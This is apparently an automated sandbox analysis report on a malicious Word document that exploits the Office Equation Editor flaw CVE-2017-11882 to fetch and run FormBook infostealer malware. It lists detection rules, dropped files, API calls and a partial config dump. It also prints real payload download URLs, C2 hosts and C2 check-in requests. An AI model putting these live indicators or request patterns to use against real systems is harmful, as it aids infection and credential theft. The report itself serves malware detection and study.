Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\Public\69577.exe, CommandLine: C:\Users\Public\69577.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\69577.exe, NewProcessName: C:\Users\Public\69577.exe, OriginalFileName: C:\Users\Public\69577.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1976, ProcessCommandLine: C:\Users\Public\69577.exe, ProcessId: 1484

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 67.199.248.10, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1976, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1976, TargetFilename: C:\Users\Public\69577.exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://neuromedic.com.br/cgi./IMG-11862.pdf

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 5.2.AddInProcess32.exe.400000.0.unpack

Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x8bbf", "KEY1_OFFSET 0x1d5ca", "CONFIG SIZE : 0xcd", "CONFIG OFFSET 0x1d6d3", "URL SIZE : 26", "searching string pattern", "strings_offset 0x1c1a3", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0x3a0289d", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d719b", "0x9f715010", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad011e04", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd014b1", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", "0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf	ReversingLabs: Detection: 43%
Source: C:\Users\Public\69577.exe	ReversingLabs: Detection: 43%

Multi AV Scanner detection for submitted file

Show sources

Source: IMG-11862.doc	Virustotal: Detection: 38%			Perma Link
Source: IMG-11862.doc	ReversingLabs: Detection: 24%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf	Joe Sandbox ML: detected
Source: C:\Users\Public\69577.exe	Joe Sandbox ML: detected

Source: 5.2.AddInProcess32.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.systray.exe.c0000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\69577.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: systray.pdbB source: AddInProcess32.exe, 00000005.00000002.2158465105.0000000000464000.00000004.00000020.sdmp
Source:	Binary string: AddInProcess32.pdb}o source: 69577.exe, 00000004.00000003.2100576876.00000000062C3000.00000004.00000001.sdmp
Source:	Binary string: AddInProcess32.pdb source: 69577.exe, 00000004.00000003.2100576876.00000000062C3000.00000004.00000001.sdmp, AddInProcess32.exe
Source:	Binary string: systray.pdb source: AddInProcess32.exe, 00000005.00000002.2158465105.0000000000464000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: AddInProcess32.exe, systray.exe

Software Vulnerabilities:

Source: C:\Users\Public\69577.exe	Code function: 4x nop then jmp 0025AE3Bh
Source: C:\Users\Public\69577.exe	Code function: 4x nop then mov esp, ebp

Source: global traffic

DNS query: name: bit.ly

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 67.199.248.10:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 35.208.61.46:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 35.208.61.46:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 35.208.61.46:80

Connects to a URL shortener service

Show sources

Source: unknown

DNS query: name: bit.ly

Source: global traffic	HTTP traffic detected: GET /bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp HTTP/1.1Host: www.theprintshop.inkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bsl/?NN=GgBvVf5PQIOdcMEbYgw1IQ+nD3ax/bg71NWpn/5pwbnZwl7mOlCqEE4iezeCyF4VQz1gwg==&Epu=zv50BpeHpnjp HTTP/1.1Host: www.bucklandnewton.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 208.91.197.39 208.91.197.39

Source: Joe Sandbox View	ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View	ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG

Source: global traffic	HTTP traffic detected: GET /3oj1Gnn HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi./IMG-11862.pdf HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: neuromedic.com.br

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6894A6BA-6F93-4194-97B0-E6749671AC21}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /3oj1Gnn HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bit.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /cgi./IMG-11862.pdf HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: neuromedic.com.br
Source: global traffic	HTTP traffic detected: GET /bsl/?NN=iMJGa3GxI6UtmkdzIO42CvbImt4iBZLhcRTuFhGcNs1w9EATRUa5v41vQqTOTJ8d8FsBhw==&Epu=zv50BpeHpnjp HTTP/1.1Host: www.theprintshop.inkConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /bsl/?NN=GgBvVf5PQIOdcMEbYgw1IQ+nD3ax/bg71NWpn/5pwbnZwl7mOlCqEE4iezeCyF4VQz1gwg==&Epu=zv50BpeHpnjp HTTP/1.1Host: www.bucklandnewton.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: bit.ly

Source: explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.pki.goog/gsr202
Source: 69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.pki.goog/gts1o1core0
Source: 69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
Source: 69577.exe, 00000004.00000002.2111325978.00000000023E7000.00000004.00000001.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: 69577.exe, 00000004.00000002.2118681264.0000000005B20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2356037346.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: 69577.exe, 00000004.00000002.2111272817.00000000023C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000006.00000000.2123702347.0000000004F30000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.2122208405.00000000041AD000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2121116386.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.icoz
Source: explorer.exe, 00000006.00000000.2128892011.000000000856E000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.2121116386.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icol
Source: explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.2133467321.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: 69577.exe, 00000004.00000002.2118681264.0000000005B20000.00000002.00000001.sdmp, explorer.exe, 00000006.00000002.2356037346.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000006.00000000.2122554413.00000000042CB000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000006.00000000.2121116386.00000000039F4000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000006.00000000.2113821795.0000000000260000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000006.00000000.2121372528.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: https://pki.goog/repository/0
Source: 69577.exe, 00000004.00000002.2108601096.000000000048D000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: 69577.exe, 00000004.00000002.2111272817.00000000023C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: 69577.exe, 00000004.00000002.2111272817.00000000023C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com(
Source: 69577.exe, 00000004.00000002.2111272817.00000000023C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2355474792.0000000000260000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2355301607.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2158148340.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2158367051.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2355676644.0000000001B10000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2114973592.0000000003E52000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2158337598.00000000003D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2114562309.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\69577.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IMG-11862[1].pdf			Jump to dropped file

Source: C:\Users\Public\69577.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\Public\69577.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\systray.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\systray.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419D60 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419E10 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419E90 NtClose,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419F40 NtAllocateVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419DB3 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00419E8A NtClose,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008400C4 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00840048 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00840078 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083F9F0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083F900 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FAE8 NtQueryInformationProcess,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FBB8 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FB68 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FC90 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FD8C NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FDC0 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FEA0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0083FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008410D0 NtOpenProcessToken,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_00840060 NtQuerySection,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_008401D4 NtSetValueKey,
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 5_2_0084010C NtOpenDirectoryObject,
